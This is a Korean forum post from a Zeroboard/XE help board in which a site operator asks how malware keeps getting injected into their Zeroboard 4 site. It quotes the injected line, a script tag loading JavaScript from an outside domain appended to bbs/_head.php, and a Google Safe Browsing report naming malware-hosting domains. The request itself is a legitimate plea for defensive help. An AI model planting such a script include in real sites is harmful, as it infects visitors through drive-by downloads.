묻고답하기

인터넷을 많이 뒤져봤는데 뚜렷한 해결책을 못찾아서 여기에 질문을 올려봅니다.
(이미 해결책이 있는데 제가 잘 이해를 못한 것일 수도 있고요)


현재 제로보드4 버전을 사용해서 운영중인 홈페이지가 있습니다.

그런데 계속 악성코드가 삽입되어서 골머리를 썩고 있습니다.


bbs/_head.php 라는 파일의 가장 마지막줄에

<?ob_start();?><script src="http://www.wsart.net/bbs/data/js/common.js></script>

라는 내용이 삽입되어서

_head.php를 인클루드하고 있는 모든 페이지들이

영향을 받고 있습니다.

script태그의 src 내용은 매번 바뀝니다.


구글의 안전브라우징 진단검사는 아래와 같습니다.

Google이 사이트를 방문했을 때의 결과

지난 90일간 진행된 사이트 테스트에서 68개의 페이지 가운데 8개에서 사용자 동의 없이 악성 소프트웨어가 다운로드 및 설치된 것으로 확인되었습니다. Google이 사이트에 마지막으로 방문한 것은 2011-04-10이며, 의심되는 콘텐츠가 마지막으로 발견된 것은 2011-04-10입니다.

Malicious software includes 3 scripting exploit(s), 3 exploit(s). Successful infection resulted in an average of 4 new process(es) on the target machine.

wkmg.co.kr/sporam.com/을(를) 포함한 2개의 도메인에서 악성 소프트웨어를 호스팅하고 있습니다.

interbar.co.kr/을(를) 비롯한 1개의 도메인이 이 사이트 방문자에게 악성코드를 유포하는 중개 역할을 한 것으로 나타났습니다.

This site was hosted on 1 network(s) including AS3786 (ERX).



혹시 이 취약점이 어떤 방식으로 해서 들어오는것인지

그리고 해결법을 알고 계신분 있으신가요???
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
타이거즈 새글이 올라오면 게시판 메뉴에 New 뜨게 하는 방법 어떻게 되나요?? [1] 2011.04.12 by cjsound
cosmo 제로보드 왕 초보에요. 업데이트를 해야하는데 어떻게해야하나요 [2] 2011.04.12 by 한마음^^
울라라420 php mysql 제로보드 관련되서 질문드립니다.  
최혁필184 회원관리 사용중지 체크 문의 드립니다.  
innerman xe 설치시 에러 [3] file 2011.04.12 by 퍼플덕
차현배 XE 관리자 페이지에서 게시판이 안뜨네요. [1] 2011.04.12 by 배추오이
배나온슈퍼맨 관리페이지 접속통계와 카운터 [1] 2011.04.12 by 백성찬
유대훈893 코어설치관련 HTMLDisplayHandler.php 문제,....  
러브텐더 요약책갈피위치및 크기  
eitetu 구글 크롤러가 trackback 주소까지 긁어 갑니다.. [1] 2011.04.12 by EcusE
삼식이 하단메뉴는 왜?  
으아짜증나 1.4.5.2로 업데이트 이후 페이지 관리가 제대로 안됩니다. [1] 2011.04.12 by Boske
슬픈동화 게시판 확장변수에 회원 정보를 기본값으로 넣을 수 있을까요?  
이상호510 [XE Core설치문제] 설치중, XML문서가 나오고 끝나버려요(화면 캡쳐한거 있어요)  
하늘종 간단한 php 질문 부탁드립니다ㅠㅠㅠ [1] 2011.04.12 by 하늘종
onam 최신 버전으로 업데이트 후 구글크롬에서  
케니2 회원가입 확장변수  
linuxman 저 제로 4와 xe가 php스킨코드등이 같이 쓰일 수가 있나요 [1] 2011.04.11 by 김 무건
제주촌닭 게시판EX - 게시판 목록에서 [1] 2011.04.11 by 천공귀제
제주촌닭 board ex 배경스킨색 설정 [3] 2011.04.11 by 제주촌닭